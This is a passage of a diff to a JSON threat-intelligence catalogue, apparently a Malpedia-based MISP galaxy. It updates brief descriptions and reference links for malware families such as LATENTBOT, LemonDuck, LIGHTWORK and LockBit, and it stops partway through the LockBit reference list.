 "http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html",
 "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf",
- "https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html",
- "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
 "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia",
+ "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/",
 "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/",
- "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/"
+ "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat",
+ "https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html"
 ],
 "synonyms": [],
 "type": []
@@ -30762,6 +32244,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ladon",
 "https://github.com/k8gege/Ladon",
+ "https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/",
 "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023"
 ],
 "synonyms": [],
@@ -30775,10 +32258,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer",
+ "https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/",
 "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html",
- "https://twitter.com/luc4m/status/1276477397102145538",
 "https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/",
- "https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/"
+ "https://twitter.com/luc4m/status/1276477397102145538"
 ],
 "synonyms": [],
 "type": []
@@ -30791,12 +32274,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
 "https://ti.qianxin.com/blog/articles/network-weapons-of-cia/",
- "https://twitter.com/_CPResearch_/status/1484502090068242433",
- "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.youtube.com/watch?v=jeLd-gw2bWo",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
+ "https://twitter.com/_CPResearch_/status/1484502090068242433",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
 "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/"
 ],
 "synonyms": [
@@ -30826,7 +32309,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.laplas",
 "https://twitter.com/Gi7w0rm/status/1604999633792647169",
- "https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/"
+ "https://embee-research.ghost.io/laplas-clipper-infrastructure/",
+ "https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/",
+ "https://any.run/cybersecurity-blog/analyzing-laplasclipper-malware/"
 ],
 "synonyms": [],
 "type": []
@@ -30835,14 +32320,14 @@
 "value": "LaplasClipper"
 },
 {
- "description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.",
+ "description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland \u2013 primarily in the financial services and insurance sectors. 
Although the infection strategy is not new, the final payload dropped \u2013 which they named LATENTBOT \u2013 caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot",
- "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/",
- "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access",
 "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html",
+ "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/",
 "http://malware-traffic-analysis.net/2017/04/25/index.html",
+ "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access",
 "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/"
 ],
 "synonyms": [],
@@ -30869,7 +32354,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor",
- "https://asec.ahnlab.com/ko/40495/"
+ "https://asec.ahnlab.com/ko/40495/",
+ "https://asec.ahnlab.com/ko/53832/"
 ],
 "synonyms": [],
 "type": []
@@ -30882,6 +32368,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader",
+ "https://asec.ahnlab.com/ko/53832/",
 "https://securelist.com/bluenoroff-methods-bypass-motw/108383/"
 ],
 "synonyms": [],
@@ -30895,8 +32382,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/",
- "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/"
+ "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/"
 ],
 "synonyms": [
 "KillDisk.NBO"
@@ -30911,8 +32399,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok",
- "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector",
 "https://www.gdatasoftware.com/blog/2015/05/24280-dissecting-the-kraken",
+ "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector",
 "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802"
 ],
 "synonyms": [],
@@ -30926,8 +32414,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat",
- "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/",
- "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/"
+ "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/",
+ "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/"
 ],
 "synonyms": [],
 "type": []
@@ -30940,10 +32428,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot",
- "https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering/",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf",
 "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
 "https://securelist.com/lazarus-trojanized-defi-app/106195/",
- "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf"
+ "https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering/",
+ "https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf",
+ "https://vblocalhost.com/uploads/VB2021-Park.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -30996,19 +32486,19 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck",
 "https://therecord.media/lemonduck-botnet-evolves-to-allow-hands-on-keyboard-intrusions/",
+ "https://success.trendmicro.com/solution/000261916",
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
 "https://cybotsai.com/lemon-duck-attack/",
 "https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/",
 "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf",
+ "https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html",
+ "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/",
 "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/",
 "https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/",
- "https://asec.ahnlab.com/en/31811/",
- "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
 "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
- "https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf",
- "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/",
- 
"https://success.trendmicro.com/solution/000261916"
+ "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
+ "https://asec.ahnlab.com/en/31811/"
 ],
 "synonyms": [],
 "type": []
@@ -31037,8 +32527,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic",
- "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html",
 "http://www.malware-traffic-analysis.net/2017/11/02/index.html",
+ "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html",
 "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/"
 ],
 "synonyms": [],
@@ -31078,10 +32568,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf",
 "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media",
+ "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/",
 "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html",
- "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf"
 ],
 "synonyms": [
 "LEMPO"
@@ -31109,14 +32599,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
- "https://securelist.com/apt-trends-report-q2-2018/86487/",
 "https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/",
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://securelist.com/apt-trends-report-q2-2018/86487/",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments",
- "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
- "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter"
 ],
 "synonyms": [
 "NETTRANS",
@@ -31128,7 +32618,7 @@
 "value": "LightNeuron"
 },
 {
- "description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user’s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ",
+ "description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user\u2019s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightning_stealer",
@@ -31140,13 +32630,26 @@
 "uuid": "48a21f7a-3dc9-4524-9628-10ed0f762bb4",
 "value": "Lightning Stealer"
 },
+ {
+ "description": "According to Mandiant, LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP. It crafts configurable IEC-104 ASDU messages, to change the state of RTU IOAs to ON or OFF. This sample works in tandem with PIEHOP, which sets up the execution. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork",
+ "https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "01cbe4cc-43ba-4bc8-9fee-9daf63dda335",
+ "value": "LIGHTWORK"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac",
- "http://atm.cybercrime-tracker.net/index.php",
- "https://securelist.com/atm-infector/74772/"
+ "https://securelist.com/atm-infector/74772/",
+ "http://atm.cybercrime-tracker.net/index.php"
 ],
 "synonyms": [],
 "type": []
@@ -31159,16 +32662,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/",
- "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
- "https://github.com/werkamsus/Lilith",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
- "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
 "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group",
 "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
 "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
+ "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
+ "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
 "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479"
+ "https://github.com/werkamsus/Lilith",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -31220,23 +32723,23 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat",
+ "https://github.com/NYAN-x-CAT/Lime-RAT/",
+ "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://www.youtube.com/watch?v=x-g-ZLeX8GM",
 "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
 "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/",
 "https://any.run/cybersecurity-blog/limerat-malware-analysis/",
 "https://lab52.io/blog/apt-c-36-recent-activity-analysis/",
- "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
- "https://www.youtube.com/watch?v=x-g-ZLeX8GM",
- "https://github.com/NYAN-x-CAT/Lime-RAT/",
- "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
 "https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- 
"https://blog.yoroi.company/research/limerat-spreads-in-the-wild/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
- "https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/"
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
+ "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/"
 ],
 "synonyms": [],
 "type": []
@@ -31288,8 +32791,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke",
- "https://norfolkinfosec.com/looking-back-at-liteduke/",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/"
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
+ "https://norfolkinfosec.com/looking-back-at-liteduke/"
 ],
 "synonyms": [],
 "type": []
@@ -31302,9 +32805,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp",
- "https://malware.news/t/recent-litehttp-activities-and-iocs/21053",
 "https://github.com/zettabithf/LiteHTTP",
- "https://viriback.com/recent-litehttp-activities-and-iocs/"
+ "https://viriback.com/recent-litehttp-activities-and-iocs/",
+ "https://malware.news/t/recent-litehttp-activities-and-iocs/21053"
 ],
 "synonyms": [],
 "type": []
@@ -31317,7 +32820,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot",
- "https://www.elastic.co/de/security-labs/elastic-security-labs-discovers-lobshot-malware"
+ "https://www.elastic.co/de/security-labs/elastic-security-labs-discovers-lobshot-malware",
+ "https://research.openanalysis.net/lobshot/bot/hvnc/triage/2023/07/16/lobshot.html"
 ],
 "synonyms": [],
 "type": []
@@ -31330,134 +32834,141 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit",
- "https://www.intrinsec.com/alphv-ransomware-gang-analysis",
- "https://asec.ahnlab.com/en/35822/",
- "https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/",
- "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
- "https://id-ransomware.blogspot.com/search?q=lockbit",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers",
- "https://asec.ahnlab.com/en/41450/",
- "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/",
- "https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware",
- "https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness",
- "https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
- "https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/",
- 
"https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
- "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
- "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511",
- "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
- "https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/",
- "https://security.packt.com/understanding-lockbit/",
- "https://analyst1.com/ransomware-diaries-volume-1/",
- "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
- "https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/",
- "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
 "https://www.dr.dk/nyheder/viden/teknologi/frygtede-skulle-lukke-alle-vindmoeller-nu-aabner-vestas-op-om-hacking-angreb",
- "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
- 
"https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf",
- "https://www.glimps.fr/dcouverte-dune-nouvelle-version-du-ramsomware-lockbit/",
- "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/",
- "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
- "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/",
- "https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/",
- "https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf",
- "https://asec.ahnlab.com/ko/39682/",
- "https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility",
- "https://www.ic3.gov/Media/News/2022/220204.pdf",
- "https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.netskope.com/blog/netskope-threat-coverage-lockbit",
- "https://www.youtube.com/watch?v=C733AyPzkoc",
- "https://ke-la.com/lockbit-2-0-interview-with-russian-osint/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/",
- 
"https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/",
- "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
- "https://www.connectwise.com/resources/lockbit-profile",
- "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants",
- "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
- "https://www.logpoint.com/en/blog/hunting-lockbit-variations-using-logpoint/",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.seqrite.com/blog/indian-power-sector-targeted-with-latest-lockbit-3-0-variant/",
- "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
- "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
- 
"https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
- "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/",
- "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
